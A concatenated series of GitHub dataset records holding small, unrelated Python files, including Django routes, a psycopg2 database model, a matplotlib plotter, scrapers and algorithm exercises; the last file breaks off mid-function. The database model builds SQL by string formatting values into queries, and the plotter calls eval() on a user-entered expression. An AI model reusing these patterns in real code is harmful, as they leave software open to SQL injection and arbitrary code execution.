self.grid_pos_to_idx(self.G)]), reward, done, {}\n\n def reset(self):\n gen_pos = lambda: [np.random.randint(0, self.height), np.random.randint(0, self.width)]\n self.S = gen_pos()\n self.G = gen_pos()\n while self.S == self.G:\n self.G = gen_pos()\n return np.array([self.grid_pos_to_idx(self.S), self.grid_pos_to_idx(self.G)])\n \n def grid_pos_to_idx(self, pos):\n return pos[0] * self.width + pos[1]\n \n def idx_to_grid_pos(self, idx):\n return (idx // self.width, idx % self.width)","repo_name":"miladsamim/GCRL","sub_path":"gcrl_intrinsic/custom_gym/envs/grid_game.py","file_name":"grid_game.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26742617447","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nimport main.views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(r'^loginView/',main.views.loginView),\n path(r'^registView/',main.views.registView),\n path(r'^logoutView/',main.views.logoutView),\n path(r'^userBorrowedBook/',main.views.userBorrowedBook),\n path(r'^staffAddBookNum/',main.views.staffAddBookNum),\n path(r'^staffCreateBook/',main.views.staffCreateBook),\n path(r'^viewBook/',main.views.viewBook),\n path(r'^main/',main.views.main),\n path(r'^regist/',main.views.regist),\n path(r'^login/',main.views.login),\n path(r'^staffBorrowUserBook/',main.views.staffBorrowUserBook),\n path(r'^staffReturnUserBook/',main.views.staffReturnUserBook),\n path(r'^staffChangeBookInfo/',main.views.staffChangeBookInfo),\n path(r'^getTypeOptions/',main.views.getTypeOptions),\n path(r'^staffViewUser/',main.views.staffViewUser),\n path(r'^staffViewUserDetail/',main.views.staffViewUserDetail)\n]\n","repo_name":"ganmk/djanog-2.1-book","sub_path":"Lib/mysite/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13300639030","text":"from psycopg2 import sql\nimport psycopg2\nimport config\n\n\nclass Model:\n def __init__(self, table, id_db=None):\n self.conn = psycopg2.connect(dbname='pr_dima', user=config.user,\n password=config.password, host=config.host)\n self.conn.autocommit = True\n if id_db:\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT id FROM {} WHERE id = {};\".format(table, id_db))\n cursor.execute(stmt)\n if cursor.fetchone():\n self.id = id_db\n else:\n stmt = sql.SQL(\"INSERT INTO {}(id) VALUES ({});\".format(table, id_db))\n cursor.execute(stmt)\n self.id = id_db\n else:\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"INSERT INTO {}(id) VALUES (DEFAULT);\".format(table))\n cursor.execute(stmt)\n\n stmt = sql.SQL(\"SELECT id FROM {} \"\n \"ORDER BY id DESC \"\n \"LIMIT 1;\".format(table, id_db))\n cursor.execute(stmt)\n self.id = cursor.fetchone()[0]\n\n def _rollback(self):\n with self.conn.cursor() as cursor:\n cursor.execute('rollback;')\n\n def _get_tables(self):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT table_name FROM information_schema.tables\"\n \" WHERE table_schema NOT IN ('information_schema','pg_catalog');\")\n\n cursor.execute(stmt)\n return list(cursor.fetchall())\n\n def showFields(self):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT column_name FROM information_schema.columns \"\n \"WHERE table_name = '{}';\".format(self.table))\n cursor.execute(stmt)\n\n res = []\n for i in cursor.fetchall()[1:]:\n res.append(i[0])\n\n return res\n\n def get_all(self):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT * FROM {} WHERE id = {};\".format(self.table, self.id))\n cursor.execute(stmt)\n return cursor.fetchone()\n\n def getField(self, field):\n if field in self.showFields() + ['id']:\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT {} FROM {} WHERE id = {};\".format(field, self.table, self.id))\n cursor.execute(stmt)\n return cursor.fetchone()[0]\n else:\n return 'Error, you must select a field from the list of fields'\n\n def setField(self, field_name, field):\n if field_name != 'id' and field_name in self.showFields():\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"UPDATE {} SET {} = '{}' WHERE id = {};\".format(self.table, field_name, field, self.id))\n cursor.execute(stmt)\n else:\n return 'Error, you cannot enter id, or you must select a field from the list of fields'\n\n def kill(self):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"DELETE FROM {} WHERE id = {};\".format(self.table, self.id))\n\n cursor.execute(stmt)\n\n# один контроллер, самый верхний уровень с пользователем, проверяет на валидность\nclass Client(Model):\n def __init__(self, id_db=None):\n self.table = 'clients'\n super().__init__(self.table, id_db)\n\n def enough_balance(self, price):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT balance FROM clients WHERE id={}\".format(self.id))\n\n cursor.execute(stmt)\n\n return price <= cursor.fetchone()[0]\n\n def pay(self, price):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"UPDATE clients SET balance = clients.balance - {} WHERE id = {}\".format(price, self.id))\n\n cursor.execute(stmt)\n\n\n\n\nclass Order(Model):\n def __init__(self, id_db=None):\n self.table = 'orders'\n super().__init__(self.table, id_db)\n\n\nclass Processor(Model):\n def __init__(self, id_db=None):\n self.table = 'processors'\n super().__init__(self.table, id_db)\n\n\nclass Basket(Model):\n def __init__(self, id_db=None):\n self.table = 'basket'\n super().__init__(self.table, id_db)\n\n def end_order(self, id_order):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"DELETE FROM {} WHERE id = {};\".format(self.table, self.id))\n\n cursor.execute(stmt)\n\n\n\nif __name__ == '__main__':\n '''a = Client(2)\n print(a.getField('name'))\n a.setField('name', 'pri')\n print(a.getField('name'))\n #a.kill()\n\n b = Order(12)\n print(b.getField('id'))\n b.setField('date_order', '1999-01-08')\n print(b.getField('date_order'))\n b.kill()\n\n c = Processor(12)\n print(c.getField('name'))\n c.setField('name', 'pri')\n print(c.getField('name'))\n c.kill()\n\n d = Basket(12)\n print(d.getField('id_client'))\n d.setField('quantity', 12)\n print(d.getField('quantity'))\n d.kill()'''\n\n client = Client(1)\n print(client.enough_balance(10000))\n","repo_name":"nemessa/labs6sem","sub_path":"dima/hz_potom_udalu/pr/lab1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9444015663","text":"def twoSum(nums, target):\n # Hashmap\n seen = {}\n for i, value in enumerate(nums):\n remaining = target - nums[i]\n\n if remaining in seen:\n return [seen[remaining], i]\n\n seen[value] = i\n\n\ndef twoSum1(nums, target):\n # Brute Force\n n = len(nums)\n i = 0\n j = i + 1\n while (i < n-1):\n while (j < n):\n if nums[i] + nums[j] == target:\n return [i, j]\n j += 1\n i += 1\n","repo_name":"lauvinfox/try-leetcode","sub_path":"1. twoSum.py","file_name":"1. twoSum.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24792432009","text":"from django.urls import path\nfrom . import views\n# \napp_name = 'song-api'\nurlpatterns = [\n path('get-list/',views.GetSongListApi.as_view(),name='songs'),\n path('get//',views.GetSongApi.as_view(),name='song'),\n path('get-artists/',views.GetArtistListApi.as_view(),name='artists'),\n path('get/artist//',views.GetArtistApi.as_view(),name='artist'),\n path('get-comming-songs/',views.GetCommingSoonSongsApi.as_view(),name='comming-soon'),\n path('vote-song//',views.VoteSong.as_view(),name='vote'),\n path('pro-users/',views.ProUsersOnlyView.as_view(),name='pro-users'),\n\n]","repo_name":"Pouria03/Music-website","sub_path":"song/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21387962631","text":"\nimport requests\nimport time\nfrom cachetools import cached, TTLCache\nfrom threading import RLock\nimport logging\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\n\nCACHE_MAX_ITEMS = 100\nCACHE_TTL = 60*60 # enhet i sekunder\n\nlock = RLock()\n\n@cached(cache = TTLCache(CACHE_MAX_ITEMS,CACHE_TTL),lock = lock)\ndef fetch_data(subid):\n log.info(\"Laddar data för subid %s\", subid)\n\n url = \"http://vattenwebb.smhi.se/hydronu/data/point?subid={}\".format(subid)\n\n res = requests.get(url)\n if res.status_code != 200:\n return None\n\n data = res.json()\n chartData = data[\"chartData\"]\n data = {\n \"poiCenter\" : data[\"poiCenter\"],\n \"subid\": chartData[\"subid\"],\n \"mq\": chartData[\"mq\"],\n \"mlq\": chartData[\"mlq\"],\n \"mhq\": chartData[\"mhq\"],\n \"hindcast\": chartData[\"coutHindcast\"][\"data\"],\n \"forecast\": chartData[\"coutForecast\"][\"data\"]\n }\n\n return data\n","repo_name":"konnik/forsbevakning-api","sub_path":"smhi.py","file_name":"smhi.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30840151881","text":"from matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)\nimport numpy as np\nclass Figure_Grapher:\n def __init__(self, window) -> None:\n self.window = window\n\n def plot(self, polynomial, min, max):\n # the figure that will contain the plot\n fig = Figure(figsize = (5, 5), dpi = 100)\n \n x = np.linspace(min, max, 100000)\n y = eval(polynomial.replace('^', '**'))\n \n # adding the subplot\n _plot = fig.add_subplot(111)\n\n # plotting the graph\n _plot.grid()\n\n if 'x' not in polynomial:\n _plot.axhline(y)\n else:\n _plot.plot(x, y)\n\n _plot.set_title(\"The Plot for:\\n{}\".format(polynomial))\n # creating the Tkinter canvas\n # containing the Matplotlib figure\n canvas = FigureCanvasTkAgg(fig, master = self.window) \n canvas.draw()\n \n graph = canvas.get_tk_widget()\n \n # creating the Matplotlib toolbar\n toolbar = NavigationToolbar2Tk(canvas, self.window)\n toolbar.update()\n \n return graph, toolbar","repo_name":"MohannadSoliman/Plotter","sub_path":"Plotter/figure_grapher.py","file_name":"figure_grapher.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35050357000","text":"words = []\nwith open('pary.txt', 'r') as f:\n for line in f:\n line = line.strip()\n num, word = line.split(\" \")\n words.append(str(word))\n\nlines = []\nfor word in words:\n max_streak = 1\n max_streak_letter = word[0]\n current_streak = 1\n current_streak_letter = word[0]\n\n for i in range(1, len(word)):\n if word[i - 1] == word[i] and word[i] == current_streak_letter:\n current_streak += 1\n if current_streak > max_streak:\n max_streak = current_streak\n max_streak_letter = current_streak_letter\n else:\n current_streak = 1\n current_streak_letter = word[i]\n\n lines.append(f\"{max_streak_letter * max_streak} {max_streak}\\n\")\n print(max_streak_letter * max_streak, max_streak)\n\nwith open('wyniki4.txt', 'a') as f:\n f.write('\\n4.2\\n\\n')\n f.writelines(lines)\n","repo_name":"GrzywN/matura-informatyka","sub_path":"rozwiazania/2020/4_2.py","file_name":"4_2.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8468441433","text":"import pandas as pd\nfrom io import StringIO\n\nstatsPath = \"../projector-server/projector-server/outputStats/\"\n\n\ndef separate_measurements(filename):\n with open(statsPath+filename, \"r\") as f:\n joinedMetrics = f.read()\n\n separated = joinedMetrics.split(\"!\\n\")\n separated.pop() # remove the last separator symbol\n return separated\n\n\ndef parse_time_metrics_file(filename):\n separated = separate_measurements(filename)\n\n # create a csvList which consists of measurements from all runs from the file in csv format\n csvList = []\n for csv in separated:\n csvList.append(pd.read_csv(StringIO(csv)))\n\n # create a dataframe that has is a deepcopy of the first csv in csvList\n averaged = csvList[0].copy(deep=True)\n fst = csvList[0]\n\n # calculate the average and standard deviation across all runs\n for i in range(fst.shape[0]):\n average = 0\n averageOfSquares = 0\n for csv in csvList:\n average += csv.iloc[i][\"Value\"]\n averageOfSquares += csv.iloc[i][\"Value\"] ** 2\n average /= len(csvList)\n averageOfSquares /= len(csvList)\n averaged.at[i, \"Value\"] = round(average, 1)\n averaged.at[i, \"Standard deviation\"] = round((averageOfSquares - average**2) ** 0.5, 1)\n\n averaged = averaged.reindex(columns=['Name', 'Params', 'Value', 'Measurement Unit', 'Standard deviation'])\n\n return averaged\n","repo_name":"muldrik/projector-report-generator","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34659188026","text":"import hashlib\nimport base64\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import urlfetch\n\nimport helpers\nimport models\n\n\n\nclass FBScraper(webapp.RequestHandler):\n\tdef get(self):\n\t\turl = \"http://www.facebook.com/pages/Childs-i-Klimb/297046608283\"\n\t\tresult = urlfetch.fetch(url)\n\t\tif result.status_code == 200:\n \t\t\tself.response.out.write(result.content)\n\n\n\t\t\nclass GMapScraper(webapp.RequestHandler):\n\tdef get(self):\n\t\turl = self.request.get(\"url\")\n\t\tquery = \"select script from html where url=\\\"http://maps.google.com/maps/ms?ie=UTF8&hl=en&msa=0&ll=-3.073324,37.411366&spn=0.126847,0.245819&t=h&z=13&msid=116890249293007182618.00048088bb3d7fc8d89e1\\\"\"\n\t\tresults = helpers.do_yql(query)['query']['results']['body']\n\t\tfor result in results:\n\t\t\titem = str(result['script']['content'])\n\t\t\tif \"KEOB\" in item:\n\t\t\t\tthings = item.split(\"KEOB\")\n\t\t\t\tgeoelements = things[1].split(\"@\")\n\t\t\t\tmessageelements = things[3].split(\"@\")\n\t\t\t\tlatlng = geoelements[1][0:geoelements[1].find(\"\\\"\")]\n\t\t\t\tlat = latlng.split(\",\")[0]\n\t\t\t\tlng = latlng.split(\",\")[1]\n\t\t\t\tmessagebits = messageelements[1].replace(\"\\\",infoWindow:{title:\\\"\", \"\").replace(\"\\\\\", \"\").replace(\"x3c\", \"\").replace(\"x3e\", \"\").replace(\"/div\", \"\").replace(\"\\n\", \" \").split(\":brbr\")\n\t\t\t\tself.response.out.write(lat)\n\t\t\t\tself.response.out.write(\"
\")\t\t\t\n\t\t\t\tself.response.out.write(lng)\n\t\t\t\tself.response.out.write(\"
\")\t\t\t\n\t\t\t\tself.response.out.write(\"
\")\n\t\t\t\tnote = \"From TeamKilimanjaro Guides
\" + messagebits[1].strip() + \"
\" + messagebits[0].strip()\n\t\t\t\tself.response.out.write(note)\n\t\t\t\tself.response.out.write(\"
\")\t\t\t\n\t\t\t\tself.response.out.write(\"
\")\n\t\t\t\tkeyhash = hashlib.md5(lat + lng).hexdigest();\n\t\t\t\tlocation = models.Location.get_or_insert(keyhash, lat=lat, lng=lng, note=note)\n\t\t\t\tgeolist = models.List.get_or_insert(\"geolist\", list=[])\n\t\t\t\tif keyhash not in geolist.list:\n\t\t\t\t\tgeolist.list.append(keyhash)\n\t\t\t\t\tnewsitem = models.NewsItem.get_or_insert(keyhash, text=note)\n\n\t\t\t\t\n\t\t\t\t\n","repo_name":"christhorpe/childsiklimb-live","sub_path":"geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37773113197","text":"def readNumber(line, index): \n number = 0\n while index < len(line) and line[index].isdigit():\n number = number * 10 + int(line[index])\n index += 1\n if index < len(line) and line[index] == '.':\n index += 1\n keta = 0.1\n while index < len(line) and line[index].isdigit():\n number += int(line[index]) * keta\n keta /= 10\n index += 1\n token = {'type': 'NUMBER', 'number': number}\n return token, index\n\ndef readPlus(line, index):\n token = {'type': 'PLUS'}\n return token, index + 1\n\ndef readMinus(line, index):\n token = {'type': 'MINUS'}\n return token, index + 1\n\ndef readTimes(line, index):\n token = {'type': 'TIMES'}\n return token, index + 1\n\ndef readDivision(line, index):\n token = {'type': 'DIVISION'}\n return token, index + 1 \n\ndef tokenize(line): \n tokens = []\n index = 0\n while index < len(line):\n if line[index].isdigit():\n (token, index) = readNumber(line, index)\n elif line[index] == '+':\n (token, index) = readPlus(line, index)\n elif line[index] == '-':\n (token, index) = readMinus(line, index)\n elif line[index] == '*':\n (token, index) = readTimes(line, index) \n elif line[index] == '/':\n (token, index) = readDivision(line, index) \n else:\n print('Invalid character found: ' + line[index])\n exit(1)\n tokens.append(token)\n #print(tokens)\n return tokens\n\ndef evaluate_first(tokens):\n answer = 1\n tokens.insert(0, {'type': 'TIMES'}) # Insert a dummy '*' token\n index = 1\n while index < len(tokens):\n #print(index)\n if tokens[index]['type'] == 'NUMBER':\n if tokens[index - 1]['type'] == 'TIMES':\n answer *= tokens[index]['number']\n tokens[index-1]['type'] = 'PLUS'\n tokens[index]['number'] = 0\n elif tokens[index - 1]['type'] == 'DIVISION':\n answer /= tokens[index]['number']\n tokens[index-1]['type'] = 'PLUS'\n tokens[index]['number'] = 0\n elif tokens[index - 1]['type'] == 'PLUS' or tokens[index-1]['type'] == 'MINUS':\n tokens[index-2]['type'] = 'NUMBER'\n tokens[index-2]['number'] = answer\n answer = tokens[index]['number']\n if (index!=len(tokens)-1) and (tokens[index+1]['type'] == 'TIMES' or tokens[index+1]['type'] == 'DIVISION'):\n tokens[index]['number'] = 0\n else:\n print('Invalid syntax')\n exit(1)\n # print(tokens)\n # print(answer)\n # print(\"=\"*10)\n index += 1\n tokens[index-1]['type'] = 'NUMBER'\n tokens[index-1]['number'] = answer\n #print(tokens)\n return tokens\n\ndef evaluate_second(tokens):\n answer = 0\n if tokens[0] != {'type': 'PLUS'}:\n tokens.insert(0, {'type': 'PLUS'}) # Insert a dummy '+' token\n index = 1\n while index < len(tokens):\n if tokens[index]['type'] == 'NUMBER':\n if tokens[index - 1]['type'] == 'PLUS':\n answer += tokens[index]['number']\n elif tokens[index - 1]['type'] == 'MINUS':\n answer -= tokens[index]['number']\n else:\n print('Invalid syntax')\n exit(1)\n index += 1\n return answer\n\ndef test(line):\n tokens = tokenize(line)\n # print(\"~\"*10)\n # print(tokens)\n # print(\"~\"*10)\n #actualAnswer = evaluate_first(tokens)\n if '*' in line or '/' in line:\n #print(\"OK\")\n tokens = evaluate_first(tokens)\n answer = evaluate_second(tokens)\n print(\"answer:%s\" % answer)\n return answer\n\nwhile True:\n print('> ', end=\"\")\n line = input()\n #tokens = tokenize(line)\n answer = test(line)\n #print(\"answer = %f\\n\" % answer)\n\n","repo_name":"akaidaruma/hw3","sub_path":"calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25433773845","text":"import os\nfrom .model import DeepLabv2_MSC\nimport types\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom torchvision import transforms\n# from .utils import *\nimport numpy as np\nimport json\nimport matplotlib.pyplot as plt\n\n\ndef build(config_path: str = '') -> nn.Module:\n \"\"\"Builds a pytorch compatible deep learning model\n\n The model can be used as any other pytorch model. Additional methods\n for `preprocessing`, `postprocessing`, `label_to_class` have been added to ease handling of the model\n and simplify interchangeability of different models.\n \"\"\"\n # Load Config file\n if not config_path: # If no config path then load default one\n config_path = os.path.join(os.path.realpath(os.path.dirname(__file__)), \"config.json\")\n\n with open(config_path, 'r') as f:\n config = json.load(f)\n \n # Load the classes\n classes_path = os.path.join(os.path.realpath(os.path.dirname(__file__)), config['classes_path'])\n \n with open(classes_path, 'r') as f:\n classes = json.load(f)\n\n # Set up model\n model = DeepLabv2_MSC(classes, config['n_blocks'], config['atrous_rates'], config['scales'] )\n weights_path = os.path.join(os.path.realpath(os.path.dirname(__file__)), config['weights_path'])\n model.load_state_dict(torch.load(weights_path), strict=True)\n\n \n model.postprocess = types.MethodType(postprocess, model)\n model.preprocess = types.MethodType(preprocess, model)\n setattr(model, 'classes', classes)\n setattr(model, 'config', config)\n\n return model\n\ndef preprocess(self, img: Image):\n \"\"\"Converts PIL Image into pytorch tensor specific to this model\n\n Handles all the necessary steps for preprocessing such as resizing, normalization.\n\n Args:\n img (PIL.Image): input image\n \"\"\"\n\n # Resize: for PIL image Image.size --> (width, height)\n scale = self.config['input_size'][0] / max(img.size[:2])\n \n input_width = min([int(img.size[0] * scale), self.config['input_size'][0]])\n input_height = min([int(img.size[1] * scale), self.config['input_size'][0]])\n \n input_img = img.resize((input_width, input_height), resample=Image.BILINEAR)\n input_img = np.array(input_img.convert(\"RGB\"))\n \n # image = cv2.resize(image, dsize=None, fx=scale, fy=scale)\n # raw_image = image.astype(np.uint8)\n\n # Original image was loaded with cv2 --> BGR\n input_img = input_img[:,:,::-1]\n\n # Subtract mean values\n input_img = input_img.astype(np.float32)\n input_img -= np.array(\n [\n float(self.config['mean_RGB'][2]),\n float(self.config['mean_RGB'][1]),\n float(self.config['mean_RGB'][0]),\n ]\n )\n\n # Convert to torch.Tensor and add \"batch\" axis\n input_img = torch.from_numpy(input_img.transpose(2, 0, 1)).float().unsqueeze(0)\n\n return input_img\n\ndef postprocess(self, detections: torch.Tensor, img: Image, visualize: bool = False):\n \"\"\"Converts pytorch tensor into interpretable format\n\n Handles all the steps for postprocessing of the raw output of the model.\n Depending on the rocket family there might be additional options.\n\n Args:\n detections (Tensor): Output Tensor to postprocess\n input_img (PIL.Image): Original input image which has not been preprocessed yet\n visualize (bool): If True outputs image with annotations else a list of bounding boxes\n \"\"\"\n # Get the size of the input_img\n scale = self.config['input_size'][0] / max(img.size[:2])\n \n input_width = min([int(img.size[0] * scale), self.config['input_size'][0]])\n input_height = min([int(img.size[1] * scale), self.config['input_size'][0]])\n \n input_img = img.resize((input_width, input_height), resample=Image.BILINEAR)\n input_img = np.array(input_img.convert(\"RGB\"))\n raw_image = input_img.astype(np.uint8)\n\n H = input_height\n W = input_width\n\n # Image -> Probability map\n logits = F.interpolate(detections, size=(H, W), mode=\"bilinear\", align_corners=False)\n probs = F.softmax(logits, dim=1)[0]\n probs = probs.cpu().numpy()\n\n # Refine the prob map with CRF\n # if postprocessor and raw_image is not None:\n # probs = postprocessor(raw_image, probs)\n\n labelmap = np.argmax(probs, axis=0)\n \n labels = np.unique(labelmap)\n \n dict_mask = {}\n\n for i, label in enumerate(labels):\n mask = labelmap == label\n dict_mask[self.classes[str(label)]] = mask.astype(np.float32)\n\n if visualize:\n visible_labels = dict_mask.keys()\n \n # Show result for each class\n rows = np.floor(np.sqrt(len(visible_labels) + 1))\n cols = np.ceil((len(visible_labels) + 1) / rows)\n\n plt.figure(figsize=(10, 10))\n ax = plt.subplot(rows, cols, 1)\n ax.set_title(\"Input image\")\n ax.imshow(raw_image)\n ax.axis(\"off\")\n\n for i, label in enumerate(visible_labels):\n mask = dict_mask[label]\n ax = plt.subplot(rows, cols, i + 2)\n ax.set_title(label)\n ax.imshow(raw_image)\n ax.imshow(mask, 'jet', alpha=0.5)\n ax.axis(\"off\")\n\n plt.tight_layout()\n plt.show()\n\n # Convert the figure to a PIL image\n # # draw the renderer\n # fig.canvas.draw ( )\n \n # # Get the RGBA buffer from the figure\n # w,h = fig.canvas.get_width_height()\n # buf = numpy.fromstring ( fig.canvas.tostring_argb(), dtype=numpy.uint8 )\n # buf.shape = ( w, h,4 )\n \n # # canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode\n # buf = numpy.roll ( buf, 3, axis = 2 )\n\n\n\n\n # line_width = 2\n # img_out = input_img\n # ctx = ImageDraw.Draw(img_out, 'RGBA')\n # for detection in list_detections:\n # # Extract information from the detection\n # topLeft = (detection['topLeft_x'], detection['topLeft_y'])\n # bottomRight = (detection['topLeft_x'] + detection['width'] - line_width, detection['topLeft_y'] + detection['height']- line_width)\n # class_name = detection['class_name']\n # bbox_confidence = detection['bbox_confidence']\n # class_confidence = detection['class_confidence']\n\n # # Draw the bounding boxes and the information related to it\n # ctx.rectangle([topLeft, bottomRight], outline=(255, 0, 0, 255), width=line_width)\n # ctx.text((topLeft[0] + 5, topLeft[1] + 10), text=\"{}, {:.2f}, {:.2f}\".format(class_name, bbox_confidence, class_confidence))\n\n # del ctx\n # return img_out\n\n return dict_mask\n\n","repo_name":"Rocketbase-AI/rockets-deeplabv2","sub_path":"rocket_builder.py","file_name":"rocket_builder.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16981653901","text":"from my_funcs.utils import division\nimport pytest\n\n\n@pytest.mark.parametrize(\"divider_one, divider_two, expected_result\", [\n (10, 2, 5),\n (20, 10, 2),\n (30, -3, -10),\n (5, 2, 2.5),\n])\ndef test_division_good(divider_one, divider_two, expected_result):\n assert division(divider_one, divider_two) == expected_result\n\n\n@pytest.mark.parametrize(\"error_expected, divider_mistake\", [\n (ZeroDivisionError, 0),\n (TypeError, \"0\"),\n])\ndef test_division_error(error_expected, divider_mistake):\n with pytest.raises(error_expected):\n division(10, divider_mistake)\n","repo_name":"Dinislam-Y/luchanos_pytest","sub_path":"tests/test_division_func.py","file_name":"test_division_func.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15019863757","text":"import numpy as np\nimport numpy.fft as nf # 用于滤波时的卷积运算\n# from guage.get_camera_parameters import location # 改进的测距方法\nimport math\n\n'''原本的测距方法'''\ndef location(height, width, X, Y):\n '''\n height :image's height\n width :image's width\n X,Y: image's centerpoint\n '''\n # 相机参数俯仰角α(度)、垂直视场角θ(度)、水平视场角β(度)、摄像头高度H(m)、摄像画面底边到摄像头的距离D_min(m)、顶边到摄像头的距离D_max(m)。\n Alpha = 90.0\n Theta = 55.3\n Beta = 87.0\n H = 7.2\n D_min = H * math.tan((Alpha - Theta / 2) / 180 * math.pi)\n W = 2 * D_min * math.tan((Beta / 2) / 180 * math.pi)\n L1 = W * (width + 1 - (float(X) - 1 / 2)) / width # 中间变量\n L2 = H * (float(height + 1 - Y) - 1 / 2) / height # 中间变量\n Xm = (L1 - W / 2) * L2 / (H - L2) + L1 # 世界坐标\n Ym = D_min * L2 / (H - L2) # 世界坐标\n loc = np.array([Xm, Ym])\n return loc\n\n\n'''\nvelocity_estimate函数输入\nid代表被检测到的车辆的id,frame_idx代表视频在第几帧,(x,y)是车辆像素坐标,(height,width)是图像的高和宽;\nnp_store是所存储的数据,sheet用于导出速度序列到excel表格.\n'''\n\n\ndef velocity_estimate(id, frame_idx, x, y, height, width, np_store, sheet):\n how_many_frame_will_detect = 45\n video_frame_rate = 60 # 视频帧数\n point = 7 # 存储point个时间点的数据\n distance_point = np.zeros(point - 1)\n velocity_point = np.zeros(point - 1)\n loc = np.zeros((2, point))\n hn = np.zeros(17) # 用于滤波\n # for i in range(17): # 设置滤波器响应的系数\n # if i == 8:\n # hn[i] = 9 / 16\n # else:\n # hn[i] = math.sin(math.pi * 9 / 16 * (i - 8)) / (math.pi * (i - 8)) * (\n # 0.54 - 0.46 * (math.cos(math.pi * i / 8)))\n # 如果用于存储数据的变量原本大小不够,扩充变量的大小(开始)\n if id > np_store.shape[0]:\n np_store = np.vstack((np_store, np.zeros((500, 2 * point + 2))))\n if id + 1 > sheet.shape[1]:\n sheet = np.hstack((sheet, np.zeros((sheet.shape[0], 10))))\n if int(frame_idx / how_many_frame_will_detect) > sheet.shape[0]:\n sheet = np.vstack((sheet, np.zeros((10, sheet.shape[1]))))\n # 如果用于存储数据的变量原本大小不够,扩充变量的大小(结束)\n if frame_idx % how_many_frame_will_detect == 2:\n for j in range(2 * point - 2): # point为7的时候,循环12次,把后���store的X、Y坐标逐个赋给前面的store\n np_store[id][j + 2] = np_store[id][j + 4] # 最前面两列数据不做改变,最后面两列数据在循环外改变\n np_store[id][2 * point] = x # point为7的时候,该项为np_store[i][14]\n np_store[id][2 * point + 1] = y # # point为7的时候,该项为np_store[i][15]\n print('fi', frame_idx)\n\n # 视频帧数小于特定值,所存储的时间段不到point-1,求平均需要除于当前存储段数\n if (frame_idx >= how_many_frame_will_detect + 2) and (frame_idx < (point - 1) * how_many_frame_will_detect + 2):\n sheet[int(frame_idx / how_many_frame_will_detect) - 1][0] = \\\n frame_idx * (how_many_frame_will_detect / video_frame_rate) / how_many_frame_will_detect\n for j in range(int(frame_idx / how_many_frame_will_detect) + 1):\n loc[:, int(point - (j + 1))] = \\\n location(height, width, np_store[id][int(2 * point) - 2 * j], np_store[id][int(2 * point) + 1 - 2 * j])\n for k in range(int(frame_idx / how_many_frame_will_detect)):\n distance_point[k] = math.sqrt(sum(np.square(loc[:, point - (k + 1)] - loc[:, point - (k + 2)])))\n velocity_point[k] = distance_point[k] / (how_many_frame_will_detect / video_frame_rate)\n xn = velocity_point[0:int(frame_idx / how_many_frame_will_detect)]\n # N1 = len(xn) #卷积运算进行滤波(开始)\n # N2 = len(hn)\n # N = N1 + N2\n # Yk = np.zeros(N)\n # Yk = nf.fft(Yk)\n # xnn = np.hstack((xn, np.zeros(N - N1)))\n # 